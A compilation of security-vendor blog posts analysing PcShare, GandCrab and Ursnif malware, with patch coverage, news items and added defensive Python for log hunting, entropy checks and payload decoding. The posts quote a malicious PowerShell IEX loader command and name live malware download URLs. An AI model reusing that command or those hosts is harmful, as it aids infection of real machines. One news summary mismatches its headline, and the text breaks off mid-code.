New Variant: PcShare Trojan, With [ups2 version 1.0.2] Server, Dec. 2018

Overview:

SonicWall Capture Labs (Threat Research Team) is announcing the following:

  • Trojan variant called PcShare, with the server “ups2 V1.0.2”.

The older Forshare Trojan was announced around the time WannaCry and the EternalBlue exploit were being covered by everyone in 2017, and nobody seemed to notice it. The information below may change your mind about this new variant: the Trojan has been rebuilt, modified and upgraded. Its capabilities are as follows:

  • Audio & Video Capturing
  • Downloading & Uploading of Files
  • Token Grabbing
  • Checking Process State
  • CPU Frequency Analysis
  • Disk Operations
  • Get Directory List
  • Get File Information
  • Get Directory Information
  • Get Disk Information
  • Renaming Files
  • Executing Files
  • Searching For Files
  • Copying Files
  • Saving Files
  • Searching Directories
  • Get Process List
  • Kill Process
  • Enumerate Processes
  • Enumerate Windows
  • Control Services
  • Reconfigure Services
  • Delete Services
  • Get Service Configs
  • Delete Registry Keys
  • Enumerate Registry Keys
  • Fill Disk Capacity
  • Memory Copying and Comparing
  • Mouse & Keyboard Logging
  • Proxy Support
  • Shell Redirection

Screenshots of these capabilities within the code base appear at the bottom of this article.

Our network sensor displayed the following IP address information, so let’s take a deeper look into the sample:

Sample Static Information:

The sample is packed with UPX 2.90 [LZMA] (Delphi Stub) as seen by the following picture:

Unpacking The Sample:

Using CFF Explorer, you can use the “UPX unpack feature” on this sample. The new static information is as follows:

Main Server Information:

Once the sample is unpacked, we can see various information inside the (Main Function) such as:

  • The version number of the server (ups2 V1.0.2).
  • The parameters of the server: (Control Mode, Debug Log, Create Action, Version and Help).
  • The log file name is also given below.

Multiple server instances are allowed:

Windows Audio Control Service:

Scanning through the main function we can find where the (Windows Audio Control) service gets created:

Checking the CreateServiceA() parameters against MSDN:
dwServiceType is 0x10, SERVICE_WIN32_OWN_PROCESS, a service that runs in its own process.
dwStartType is 0x2, SERVICE_AUTO_START, a service started automatically by the SCM during startup.

Next, the service will setup its control handler procedure:

The service control handler accepts (five) controls.

Every control falls through to the same default routine, which only handles error reporting and debug logging for the server.

This tells us the (Windows Audio Control) service is just a front: its handler does nothing beyond debugging and error handling.

The Server Updating and Downloading Multiple Files:

Every two hours the server checks for the following files (the “HTTP Network Objects” below) and executes every line of each one it retrieves:

  • xpdown.dat
  • down.html
  • 64.html
  • vers.html
  • kill.txt
  • downs.txt
  • downs.exe
  • b.exe aka msief.exe
  • item.dll aka item.dat
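A hunt for the two-hourly update poll in HTTP/proxy logs, written as an added example for this write-up rather than code taken from it or from the PcShare project: it clusters requests for the object names listed above per client, and flags any object re-fetched at roughly a two-hour interval. The log format is a constructed Squid-style access log, and every client and server address in it is a placeholder.

```python
"""Hunt for the PcShare update poll in HTTP/proxy logs.
Added example, not from the SonicWall write-up: the log format is a constructed
Squid-style access log and every host and client address is a placeholder."""
import re
from collections import defaultdict

# Object names the server fetches every two hours (list taken from the write-up).
PCSHARE_OBJECTS = {
    "xpdown.dat", "down.html", "64.html", "vers.html", "kill.txt",
    "downs.txt", "downs.exe", "b.exe", "msief.exe", "item.dll", "item.dat",
}
TWO_HOURS = 7200.0

# Constructed sample log: "<epoch> <client> <method> <url>" per line.
SAMPLE_LOG = """\
1544140000.000 10.0.0.5 GET http://192.0.2.10/xpdown.dat
1544140001.250 10.0.0.5 GET http://192.0.2.10/down.html
1544140002.500 10.0.0.7 GET http://example.org/index.html
1544147199.900 10.0.0.5 GET http://192.0.2.10/xpdown.dat
1544147201.100 10.0.0.5 GET http://192.0.2.10/downs.txt
1544147202.300 10.0.0.5 GET http://192.0.2.10/item.dll
1544147300.000 10.0.0.9 GET http://198.51.100.4/vers.html
"""

LINE_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<client>\S+)\s+\S+\s+(?P<url>\S+)")


def basename_of(url: str) -> str:
    """Last path component of a URL, lower-cased, query string stripped."""
    path = url.split("://", 1)[-1].split("?", 1)[0]
    return path.rsplit("/", 1)[-1].lower()


def parse_log(log_text: str):
    """Yield (timestamp, client, object name) for every parseable line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield float(m.group("ts")), m.group("client"), basename_of(m.group("url"))


def find_pcshare_polls(log_text: str, min_hits: int = 2) -> dict:
    """Clients that requested at least `min_hits` distinct PcShare object names.
    A single name such as 64.html is common enough on its own; the cluster is the signal."""
    hits = defaultdict(set)
    for _, client, name in parse_log(log_text):
        if name in PCSHARE_OBJECTS:
            hits[client].add(name)
    return {c: sorted(n) for c, n in hits.items() if len(n) >= min_hits}


def two_hour_beacons(log_text: str, tolerance: float = 60.0) -> set:
    """(client, object) pairs re-fetched at the two-hour cadence the server uses."""
    seen = defaultdict(list)
    for ts, client, name in parse_log(log_text):
        if name in PCSHARE_OBJECTS:
            seen[(client, name)].append(ts)
    beacons = set()
    for key, stamps in seen.items():
        stamps.sort()
        for earlier, later in zip(stamps, stamps[1:]):
            if abs((later - earlier) - TWO_HOURS) <= tolerance:
                beacons.add(key)
    return beacons


if __name__ == "__main__":
    print(find_pcshare_polls(SAMPLE_LOG))
    print(two_hour_beacons(SAMPLE_LOG))
```

Requiring two distinct object names per client keeps a lone hit on a generic name like 64.html or down.html from paging anyone; the cadence check is the stronger signal, since the file names are cheap for the operator to change but the polling interval is baked into the binary.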

HTTP Network Objects

Wireshark Http Objects:

[Network Object 1]: xpdown.dat:

When we exported the xpdown.dat object from Wireshark, the object was RSA encrypted with one of the keys below:

This is the object pulled from Wireshark.

The file is also written to disk through the CreateFile API (xpdown.dat code):

After the file was created we were able to look at the contents of xpdown.dat:

[Network Object 2]: down.html:

[Network Object 3] 64.html:

[Network Object 4]: vers.html:

[Network Object 5]: kill.txt:

[Network Object 6]: downs.txt:

[Network Object 7]: downs.exe:

downs.exe file static information.

downs.exe file information: this is cacls, legitimate clean software:

[Network Object 8]: b.exe aka msief.exe:

b.exe static information.

The “b.exe” binary is a self-extracting archive (installer). We can see one of its resources below:

Using 7-Zip to extract the self-extracting installer yields the following directory structure:

c3.bat

cacls changes permissions on files and folders:
/e edits the ACL instead of replacing it.
/d denies the specified user access.


n.vbs

The n.vbs script will call c3.bat above.

Special Find, (Item.dll aka Item.dat)

Inside downs.txt (Network Object 6) we found something pretty special.
When we visited the “/item.dll” location to see if we could download “item.dat”, it was still active and we were able to pull down the file. Here is what the static information looks like:

Next, we checked its entropy to see whether it was encrypted or packed.

Because the entropy was high, we scanned it for packers and protectors and found:
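The entropy check described here, as an added example that is not part of the original analysis: a Shannon entropy routine, a per-block profile for spotting an unpacked stub in front of a packed body, and a triage verdict. The 7.0 bits-per-byte threshold is a common rule of thumb rather than a value from the article, and the sample inputs are constructed.

```python
"""Shannon entropy as a packed/encrypted indicator for a suspicious file such
as item.dat. Added example, not from the write-up; the 7.0 bits/byte threshold
is a common rule of thumb and the inputs below are constructed."""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_profile(data: bytes, block: int = 1024) -> list:
    """Per-block entropies; a low-entropy stub followed by high-entropy blocks
    is the typical shape of a packed executable."""
    return [shannon_entropy(data[i:i + block]) for i in range(0, len(data), block)]


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """True when the whole buffer is near-uniform, i.e. compressed or encrypted."""
    return shannon_entropy(data) >= threshold


# Constructed inputs: English text vs. deterministic pseudo-random bytes
# (standing in for a packed/encrypted section).
TEXT = b"The quick brown fox jumps over the lazy dog. " * 256
RNG = random.Random(1)
RANDOM = bytes(RNG.getrandbits(8) for _ in range(4096))


def triage(data: bytes) -> str:
    """One-line verdict in the spirit of the write-up's packer scan."""
    overall = shannon_entropy(data)
    prof = entropy_profile(data)
    if overall >= 7.0:
        return "high entropy (%.2f): likely packed or encrypted, scan for packers" % overall
    if prof and max(prof) >= 7.0 > min(prof):
        return "mixed entropy (max %.2f): unpacked stub plus packed section" % max(prof)
    return "low entropy (%.2f): probably not packed" % overall


if __name__ == "__main__":
    print(triage(TEXT))
    print(triage(RANDOM))
    print(triage(TEXT + RANDOM))
```

The per-block profile matters in practice: a packer leaves a small plaintext loader stub and import table at the front of the file, so a whole-file average can sit below the threshold while most of the image is still opaque.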

Knowing the file was packed and protected, we threw it into IDA Pro anyway, mostly to see whether any artifacts survived. Sure enough, we found the following:

Finding “zsdfvvgt.dll” was a lucky break because it led us straight to GitHub:

(Item.dll aka Item.dat) is part of this project: https://github.com/sinmx/pcshare/

We located the artifact here: https://github.com/sinmx/pcshare/blob/master/%E4%BC%81%E4%B8%9A%E5%AE%9A%E5%81%9A/PcMain/PcMain.def

This gives us access to the entire code base without unpacking the sample. Sometimes you get lucky and find what you need in the dark corners of a binary.

Supported Systems:

Capability Overview:

Audio

Delete Service

CPU Frequency

Disk Operations

Memory Operations

Mouse and Keyboard Operations

Proxy Support

CMyClientMain Class Code Base

Summary:

This Trojan is disguised as legitimate software (Windows Audio Control Service).
It displayed the following behaviour:

  • A backdoor that gives malicious users remote control over the machine.
  • An uploader, downloader and updater that installs malware components and scripts over time.
  • The sample is statically linked with OpenSSL 0.9.8x (10 May 2012), which makes the code base larger than it should be and generates false positives for ransomware and miner malware signatures.
  • It modifies, deletes and copies data, disrupting the normal performance of your computer and network.
  • The sample uses RSA (public and private key) asymmetric encryption.

SonicWall Gateway AntiVirus, provides protection against this threat:

  • GAV: Barys.A_733

GandCrab Ransomware has started hiding under Javascript and Powershell

SonicWall Capture Labs Research team recently observed a malware campaign delivering GandCrab ransomware hidden inside JavaScript and PowerShell. The ransomware encrypts files on the victim’s computer and demands a ransom to decrypt them. This variant of GandCrab uses powershell.exe to load the payload DLL in memory and perform the encryption, instead of dropping a PE file to disk and executing it.

Infection Cycle:

The infection begins with a JavaScript file shown in image below.

Fig-1. Initial JavaScript containing encrypted scripts

The above JavaScript contains an encrypted PowerShell script and an encrypted JavaScript. After a 10 second delay, it decrypts the encrypted JavaScript and executes it.

Fig-2. Decrypted JavaScript

This JavaScript creates a log file in the %appdata% folder. The log file contains an encoded PowerShell script decrypted from the data shown in Fig-1. The encoded PowerShell script is shown below.

Fig-3. Encoded PowerShell Script
 

The PowerShell script is decoded by removing every ‘?’ character and then executed.

To execute the PowerShell script it uses the following command:

jklqtyurkut.ShellExecute(wcnquc, '-ExecutionPolicy Bypass -Command "IEX (([System.IO.File]::ReadAllText(\'' + bygeyemm + 'bwcuoqir.log' + '\')).Replace(\'?\',\'\'));"', "", "open", 0);

 

where “wcnquc” has the path for PowerShell.exe.

Fig- 4. Decoded powershell script

 

This decoded PowerShell script base64-decodes another PowerShell script and executes it. The newly decoded PowerShell script is shown below:

Fig-5. 2nd PowerShell Script

This second PowerShell script contains a compressed, base64-encoded PE file. It decompresses the PE file and loads it into the memory of powershell.exe. The loaded PE file is a .NET DLL that in turn contains another base64-encoded PE file; the .NET DLL decodes it and loads it in memory as shown below:

Fig-6. .NET DLL containing a base64-encoded PE file

This decoded PE file is a Borland Delphi DLL containing an encrypted GandCrab payload. It decrypts the main payload in memory and executes it. The payload now runs inside powershell.exe and starts encrypting. No PE file is dropped to disk; the GandCrab payload is loaded and executed entirely within the memory of powershell.exe.
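The first three layers described above (strip the ‘?’ salt, base64-decode the second script, base64-decode and decompress the PE it carries), as an added example that is not the campaign’s loader code. The payload is a constructed stand-in for the .NET DLL, and raw Deflate is assumed for the compression step because the write-up does not name the algorithm; the Delphi DLL’s final decryption layer is not covered.

```python
"""Peel the loader layers described above: the '?'-salted log file that turns
into PowerShell once the '?' characters are removed, the base64-wrapped second
script, and the base64-encoded compressed PE it carries. Added example, not the
campaign's own code: the payload below is constructed, and raw Deflate is
assumed for the compression step (the write-up does not name the algorithm)."""
import base64
import re
import zlib

B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def strip_salt(text: str, salt: str = "?") -> str:
    """Mirror of .Replace('?','') in the launcher command."""
    return text.replace(salt, "")


def base64_blobs(text: str):
    """Decode every long base64 run in a script, skipping runs that fail validation."""
    for m in B64_RUN.finditer(text):
        try:
            yield base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue


def inflate(blob: bytes) -> bytes:
    """Try raw Deflate (assumed), then zlib- and gzip-wrapped; return input unchanged otherwise."""
    for wbits in (-15, 15, 31):
        try:
            return zlib.decompress(blob, wbits)
        except zlib.error:
            continue
    return blob


def extract_pe(salted_log: str) -> bytes:
    """Return the PE carried by the second-stage script, or b'' if none is found."""
    stage1 = strip_salt(salted_log)
    for stage2_bytes in base64_blobs(stage1):
        stage2 = stage2_bytes.decode("utf-8", "ignore")
        for inner in base64_blobs(stage2):
            candidate = inflate(inner)
            if candidate.startswith(b"MZ"):
                return candidate
    return b""


# --- constructed sample, assembled the way the loader chain would assemble it ---
FAKE_PE = b"MZ" + bytes(range(256)) * 2 + b"PE\x00\x00"   # stand-in for the .NET DLL


def raw_deflate(data: bytes) -> bytes:
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


STAGE2 = ("$b=[Convert]::FromBase64String('%s')\n"
          "# decompress and load into memory here\n"
          % base64.b64encode(raw_deflate(FAKE_PE)).decode())
STAGE1 = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('%s')))"
          % base64.b64encode(STAGE2.encode()).decode())
# The log file as dropped: a '?' after every third character.
SALTED_LOG = "".join(ch + "?" if i % 3 == 2 else ch for i, ch in enumerate(STAGE1))


if __name__ == "__main__":
    pe = extract_pe(SALTED_LOG)
    print("recovered %d bytes, MZ=%s" % (len(pe), pe[:2] == b"MZ"))
```

Looking for long base64 runs rather than parsing the PowerShell is deliberate: the variable names change from sample to sample, but a base64-wrapped stage is still a long run of the base64 alphabet, and the MZ check at the end is what tells a real hit from a decoy blob.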

After encryption, it displays the following message by changing the desktop wallpaper.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: GandCrab.RSM_10 (Trojan)

Microsoft Security Bulletin Coverage for December 2018

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of December 2018. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2018-8477 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8514 Remote Procedure Call runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8517 .NET Framework Denial Of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8540 .NET Framework Remote Code Injection Vulnerability
There are no known exploits in the wild.
CVE-2018-8580 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8583 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13943 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 3
CVE-2018-8587 Microsoft Outlook Remote Code Execution Vulnerability
ASPY 5339 Malformed-File rwz.MP.2
CVE-2018-8595 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8596 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8597 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8598 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8599 Diagnostics Hub Standard Collector Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8604 Microsoft Exchange Server Tampering Vulnerability
There are no known exploits in the wild.
CVE-2018-8611 Windows Kernel Elevation of Privilege Vulnerability
ASPY 5341 Malformed-File exe.MP.46
CVE-2018-8612 Connected User Experiences and Telemetry Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8617 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 3756 EXPLOIT HTTP Client Shellcode 19
CVE-2018-8618 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13944 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 4
CVE-2018-8619 Internet Explorer Remote Code Execution Vulnerability
IPS 13939 Internet Explorer Remote Code Execution Vulnerability (DEC 18)
CVE-2018-8621 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8622 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8624 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13936 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 1
CVE-2018-8625 Windows VBScript Engine Remote Code Execution Vulnerability
IPS 13945 VBScript Engine Remote Code Execution Vulnerability (DEC 18) 1
CVE-2018-8626 Windows DNS Server Heap Overflow Vulnerability
There are no known exploits in the wild.
CVE-2018-8627 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8628 Microsoft PowerPoint Remote Code Execution Vulnerability
ASPY 5340 Malformed-File ppt.MP.8
CVE-2018-8629 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13937 Chakra Scripting Engine Memory Corruption Vulnerability (DEC 18) 2
CVE-2018-8631 Internet Explorer Memory Corruption Vulnerability
IPS 13935 Internet Explorer Memory Corruption Vulnerability (DEC 18) 2
CVE-2018-8634 Microsoft Text-To-Speech Remote Code Execution Vulnerability
IPS 13934 Internet Explorer Memory Corruption Vulnerability (DEC 18) 1
CVE-2018-8635 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8636 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8637 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8638 DirectX Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8639 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8641 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8643 Scripting Engine Memory Corruption Vulnerability
IPS 13946 Windows Scripting Engine Memory Corruption Vulnerability (DEC 18) 1
CVE-2018-8649 Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2018-8651 Microsoft Dynamics NAV Cross Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2018-8652 Windows Azure Pack Cross Site Scripting Vulnerability
There are no known exploits in the wild.

PDF campaign distributing Ursnif through malicious VBS

SonicWall RTDMI engine detected a number of PDF files containing a link to a malicious archive file. The absence of the malicious file from popular malware search portals like VirusTotal and ReversingLabs at the time of detection indicates the effectiveness of the RTDMI engine.

Fig-1 VirusTotal results for the PDF file

 

Analysis

PDF files are being distributed to victims disguised as documents from Australian organizations such as Indigenous Business Australia. To deceive victims, each PDF is made to look as realistic as possible with misleading text and icons related to the organization whose users are targeted. The document displays an icon suggesting that a document file will be downloaded when the icon is clicked, as shown in the images below. Instead, an archive containing a malicious VBScript is downloaded from “hxxp://kruanchan.com/00198728883.zip”.

Fig-2 Snapshots of PDF files.

At the time of analysis, both the archive and the malicious VBScript had detections from only a handful of AV vendors, as can be seen below:

Fig-3 VirusTotal results for the downloaded archive file

Fig-4 VirusTotal results for the VBS script file

To hinder analysis, the VBScript is highly obfuscated as shown below:

Fig-5: Obfuscated VBScript code

Fig-6 Code of VBScript after deobfuscation

As seen above, the script first creates an Internet shortcut file named “Google.url” in the %TEMP% directory with ‘www.google.com’ as the target link. It then tries to download malicious content from “hxxp://news.pompeox.org/”, saves it in the %TEMP% folder as “ie.exe” and finally executes the downloaded file. The downloaded file belongs to the Ursnif malware family.
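Pulling /URI link targets out of a PDF and flagging those that fetch an archive or script, the lure pattern described above, as an added example rather than SonicWall’s RTDMI logic. The one-page PDF is constructed in memory; apart from the archive URL quoted above, the URLs are placeholders.

```python
"""Extract /URI link targets from a PDF and flag the ones that fetch archives
or scripts, the lure pattern described above. Added example, not SonicWall's
RTDMI logic: the PDF below is constructed in memory and the URLs other than the
one quoted in the write-up are placeholders."""
import re
import zlib

SUSPICIOUS_EXT = (".zip", ".rar", ".7z", ".vbs", ".js", ".cmd", ".exe", ".scr")
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def unescape_pdf_string(raw: bytes) -> str:
    """Undo the backslash escapes PDF literal strings use (nested balanced parens not handled)."""
    return (raw.replace(b"\\(", b"(").replace(b"\\)", b")")
               .replace(b"\\\\", b"\\").decode("latin-1"))


def pdf_uris(pdf: bytes) -> list:
    """Every /URI target in the file, including those inside FlateDecode streams."""
    uris = [unescape_pdf_string(m.group(1)) for m in URI_RE.finditer(pdf)]
    for m in STREAM_RE.finditer(pdf):
        try:
            body = zlib.decompress(m.group(1))
        except zlib.error:
            continue            # not Flate-compressed, or not a stream we can read
        uris += [unescape_pdf_string(u.group(1)) for u in URI_RE.finditer(body)]
    return uris


def suspicious_uris(pdf: bytes) -> list:
    """Targets whose path ends in an archive or script extension."""
    return [u for u in pdf_uris(pdf)
            if u.lower().split("?", 1)[0].endswith(SUSPICIOUS_EXT)]


# Constructed one-page PDF: a benign link, the archive link from the write-up,
# and a third link hidden in a Flate-compressed object stream.
HIDDEN_OBJ = zlib.compress(b"<< /S /URI /URI (http://example.net/invoice.pdf.vbs) >>")
HEADER = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 5 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 100 20]\n"
    b"   /A << /S /URI /URI (https://www.example.com/about) >> >> endobj\n"
    b"5 0 obj << /Type /Annot /Subtype /Link /Rect [0 40 200 60]\n"
    b"   /A << /S /URI /URI (hxxp://kruanchan.com/00198728883.zip) >> >> endobj\n"
)
STREAM_OBJ = (b"6 0 obj << /Length " + str(len(HIDDEN_OBJ)).encode()
              + b" /Filter /FlateDecode >>\nstream\n" + HIDDEN_OBJ
              + b"\nendstream\nendobj\n")
SAMPLE_PDF = HEADER + STREAM_OBJ + b"trailer << /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    for uri in pdf_uris(SAMPLE_PDF):
        print(("SUSPICIOUS " if uri in suspicious_uris(SAMPLE_PDF) else "ok         ") + uri)
```

Scanning decompressed streams is the part that matters: a lure that keeps its link in a plain annotation dictionary is caught by a string search, while one that tucks the action into a compressed object stream is not, and the hidden-link case above shows the difference.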

Indicators of Compromise:

PDF:

0a2f235f05f376fcf150fda15229b070dec2018cb944b1bd0d9a4e25b5bdcf93

27ea0ef04a082aa7a48f48d4197b9039eeadd4b01eb6c285581acdcc436d5d9c

3a22b101a3af813080be8aaeb73583eef5f4683363330cd6a0342efee1282b7b

3e96c3c6829cd3fc3b79c9407321f832ff30d372a350e5eead67a907c188f814

97992932e1651273168da68bfbbe7ed50a02e5829ccdfde9543faeb83020835d

b3da4bbdc7e6da8111eff84051f0c91da2424905e7ea81facd8f3ceba01e1222

e9fc167781608914489c500ed5445c27db0b3e216a7917c2c9b88269ba864b6c

Archive: ab74a5181b552055621e1abbd0336a1d7f110360db20ab8e51f97a332d4024e3

VBS: 554da6d32b3226bfe058fa545be80dc06895cca33843bf618c7c65a5e14d47b4

Fig-7 Snapshot of SMASH detection Report

Video: Why Layered Security Matters

Understanding the benefits of certain security technology is always important. But hearing innovation explained by two cybersecurity industry icons provides the context to appreciate how it works and the importance of implementing sound defenses to survive in an ever-changing cyber war.

In this exclusive video, SonicWall President and CEO Bill Conner and CTO John Gmuender walk you through the current cyber threat landscape, explore the importance of automated real-time breach detection and prevention, and address how to mitigate today’s most modern cyberattacks. The video provides:

  • Exclusive cyberattack data for ransomware, malware, encrypted threats, web app attacks, malware attacks on non-standard ports and more
  • In-depth view into the key security layers that power automated real-time detection and prevention
  • Real-world use cases, including remote and mobile security, web application protection, traditional network security, cloud sandboxing and more
  • Detailed breakdown of the SonicWall Capture Cloud Platform

NRF 2019: Join SonicWall at the ‘Big Show’

SonicWall at NRF 2019
Booth 1045
Javits Center
655 W 34th Street
New York, NY 10001
Register now to get a free lunch voucher and learn how SonicWall can help protect your retail organization.

The end of the year may be approaching, but SonicWall is already gearing up for 2019 by attending one of the retail industry’s biggest events.

Join SonicWall at NRF 2019, the National Retail Federation’s ‘Big Show,’ Jan.13-15 at the Jacob K. Javits Convention Center in New York. The NRF 2019 agenda features a lineup of industry expert speakers, networking events and lounges, workshops, podcast studio and expo hall.

SonicWall is partnering with Cerdant at Booth 1045 on the expo floor, where more than 37,000 attendees are expected to explore innovative technologies, learn about groundbreaking solutions and connect with more than 700 exhibitors impacting retail today.

Who Attends NRF 2019?

NRF 2019 attendees include retailers, industry professionals and members of the press. Attendees seek to absorb rich and robust content from the leaders of retail, technology, finance and business, as well as to learn about and source new products and services to transform their business. To get a sense of the scope and scale of the event, watch the NRF 2018 recap:

SonicWall is a leader in cybersecurity and PCI compliance for retail networks and offers attendees a unique booth experience with access to learn how retailers can:

  • Comply with PCI and other security and privacy regulations
  • Block increasing ransomware, email threats, memory exploits and encrypted malware
  • Secure new tablet-based POS endpoints
  • Protect both wired and wireless networks
  • Easily deploy and manage security across multiple distributed branches or locations
  • Ensure maximum security within limited budget constraints
  • Protect business with secure email communication

More than 15,000 retail and hospitality organizations worldwide already rely on SonicWall for fast, secure and easy-to-manage wireless access for customers and employees, scalable email security that protects both the organization’s and customers’ data, and centralized security management that increases effectiveness while decreasing admin costs.

Register for NRF 2019 now and receive a lunch voucher, compliments of SonicWall.

About NRF

The National Retail Federation (NRF) is the world’s largest retail trade association, representing discount and department stores, home goods and specialty stores, Main Street merchants, grocers, wholesalers, chain restaurants and internet retailers from the United States and more than 45 countries.

Membership with NRF provides retailers with the opportunity to advocate on important policy issues, gain insights from industry leaders and visionaries and network with retail’s best and brightest.

Cyber Security News & Trends – 12-07-18

This week SonicWall has taken to the airwaves as CEO Bill Conner is profiled by KRLD Radio, and in industry news, more new breaches revealed but impacted companies like Quora are saying that Marriott International has it far worse.


SonicWall Spotlight

New Law Aids SMBs in Combating Cybersecurity Risks – The Channel Pro Network

CRN’s 2018 Products of the Year – CRN

  • The SonicWall Capture Cloud Platform was announced as a finalist in CRN’s 2018 Products of the Year in the security-cloud category.

CEO Spotlight: Bill Conner, CEO, SonicWall – KRLD Radio (US)

  • SonicWall CEO Bill Conner is featured on KRLD’s CEO Spotlight radio segment discussing SonicWall’s holiday cyber threat data.

Cyber Security News

Cyber-espionage group uses Chrome extension to infect victims – ZD Net

  • Netscout researchers have released a report revealing details of a nation-state-backed hacking group’s efforts to target the academic sector by pushing a malicious Google Chrome extension through a spear-phishing email campaign.

DHS Says SamSam Ransomware is Targeting Critical Infrastructure Entities – Security Week

  • The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) issue an alert on activity related to SamSam, the malware which has supposedly cost private enterprises and organizations over $5.9 million in the last two years.

U.S. Financial Firms to Further Increase Cybersecurity Spending – Bloomberg

  • U.S. banks and other financial firms are projecting higher spending on cybersecurity as they face bigger threats and more attacks.

Marriott looking at China in data breach: report – The Hill

  • Investigators looking into the recent Marriott breach, which saw personal data belonging to over 500 million hotel guests exposed, are looking to China as the most likely source of the attack.

Quora reports data breach affecting 100 million users – Phys Org

  • Quora has notified users of a data breach involving the email addresses and encrypted passwords of about 100 million users. The question-and-answer website is downplaying the incident, claiming that it “is nothing like” the sustained breach suffered by Marriott International over the last four years.

Why Cyber Monday Is Just the Beginning of the Festive Hacking Season – ZDNet

  • Cyberattacks reach a peak around the holiday season but ZDNet argue that understaffing over Christmas leaves many companies open to further attacks.

Huawei Said to Plan $2 Billion Cybersecurity Reboot – Industry Week

  • Small companies often do not have the resources to be able to meet the strictest cybersecurity standards. Two academics argue that they should not be financially penalized in the same way as larger corporations can be.

In Case You Missed It

Archive file carrying an obfuscated and multi-staged downloader first spotted by SonicWall RTDMI

SonicWall RTDMI engine has recently seen a surge in very small archive files (~600-700 bytes in size) circulating on the network.

 

The archive file’s absence from popular threat intelligence sharing portals like VirusTotal and ReversingLabs indicates its uniqueness and limited distribution.

The archive files carry a batch script named *.jpg.cmd or *.pdf.cmd.

The batch script is highly obfuscated, as shown below; it downloads and executes a PowerShell script.

The deobfuscated batch script, shown below, downloads the initial payload from ‘http://fortalecergroup.com.br/bals/index.php?o=YmFsczM=’

The code snippet of the downloaded PowerShell script is shown below:

The PowerShell script then downloads a second-stage payload, an archive file encrypted with a simple XOR algorithm to evade detection. The downloaded content is decrypted and extracted, and the component files listed below are renamed with random names and appropriate file extensions, then executed by the PowerShell script.
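Recovering the XOR-encrypted second stage, as an added example that is not the campaign’s code: the ZIP local-file-header magic is known plaintext, so a single-byte key is brute-forced against it and then confirmed by actually opening the archive. A one-byte key is an assumption (the write-up only says ‘simple XOR’), and the encrypted archive is constructed in memory.

```python
"""Recover the XOR-encrypted second-stage archive: brute-force a single-byte
key against the ZIP local-file-header magic, then open the result. Added
example, not the campaign's code; a one-byte key is an assumption (the
write-up only says 'simple XOR') and the archive below is constructed."""
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR `data` with a repeating `key` (works for one-byte and multi-byte keys)."""
    klen = len(key)
    return bytes(b ^ key[i % klen] for i, b in enumerate(data))


def recover_key(blob: bytes):
    """Single-byte key under which the blob starts with PK\\x03\\x04, or None."""
    if len(blob) < 4:
        return None
    for key in range(256):
        if xor_bytes(blob[:4], bytes([key])) == ZIP_MAGIC:
            return key
    return None


def extract_members(blob: bytes) -> dict:
    """Decrypt and unpack; returns {member name: bytes}. Opening the archive is
    the real check that the recovered key is right, not just the 4-byte magic."""
    key = recover_key(blob)
    if key is None:
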